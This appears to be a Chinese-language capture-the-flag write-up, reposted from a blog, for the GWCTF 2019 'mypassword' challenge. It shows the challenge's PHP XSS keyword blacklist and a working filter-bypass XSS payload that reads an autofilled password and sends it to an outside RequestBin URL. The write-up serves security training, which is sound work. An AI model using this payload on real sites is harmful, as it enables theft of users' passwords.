![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650613504.gif "[GWCTF 2019]mypassword-解题步骤详解")
#题目:
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650613506.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/10-1650613508.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/1-1650613511.png "[GWCTF 2019]mypassword-解题步骤详解")
三个界面,注册界面源代码毛都没有,登录界面源代码里面有东西
if (document.cookie && document.cookie != '') {var cookies = document.cookie.split('; ');var cookie = {};for (var i = 0; i < cookies.length; i++) {var arr = cookies[i].split('=');var key = arr[0];cookie[key] = arr[1];}if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){document.getElementsByName("username")[0].value = cookie['user'];document.getElementsByName("password")[0].value = cookie['psw'];}}
#意思很明确,就是用户名和密码都写入了表单
#下面我们注册一下
登录进去之后,出现feedback界面
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/9-1650613512.png "[GWCTF 2019]mypassword-解题步骤详解")
点进去看一下
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650613514.png "[GWCTF 2019]mypassword-解题步骤详解")
发现源码里有文章
if(is_array($feedback)){echo "<script>alert('反馈不合法');</script>";return false;}$blacklist = ['_',''','&','\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];foreach ($blacklist as $val) {while(true){if(stripos($feedback,$val) !== false){$feedback = str_ireplace($val,"",$feedback);}else{break;}}}
显而易见给过滤了不少东西,由于我们已经知道login.js有记录密码的功能。
这时候就要介绍我们的
http://http.requestbin.buuoj.cn网址,(RequestBin提供了一个URL,该URL将收集对其发出的请求,首页点击create a requestbin)
构造POC就很简单了
<incookieput type="text" name="username"><incookieput type="password" name="password"><scrcookieipt scookierc="./js/login.js"></scrcookieipt><scrcookieipt>var psw = docucookiement.getcookieElementsByName("password")[0].value;docucookiement.locacookietion="http://http.requestbin.buuoj.cn/y6b4uwy6/?a="+psw;</scrcookieipt>
提交成功之后去BIN里面看一下
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650613516.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/4-1650613518.png "[GWCTF 2019]mypassword-解题步骤详解")
原文来自CSDN博主「浩歌已行」|侵删
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650613519.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/6-1650613521.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650613522.png "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/1-1650613523.png "[GWCTF 2019]mypassword-解题步骤详解")
。想加入我们就给我们留言吧![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/0-1650613525.png "[GWCTF 2019]mypassword-解题步骤详解")
。![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/3-1650613526.gif "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/5-1650613528.gif "[GWCTF 2019]mypassword-解题步骤详解")
![[GWCTF 2019]mypassword-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/04/1-1650613530.png "[GWCTF 2019]mypassword-解题步骤详解")
原文始发于微信公众号(寰宇卫士):[GWCTF 2019]mypassword-解题步骤详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论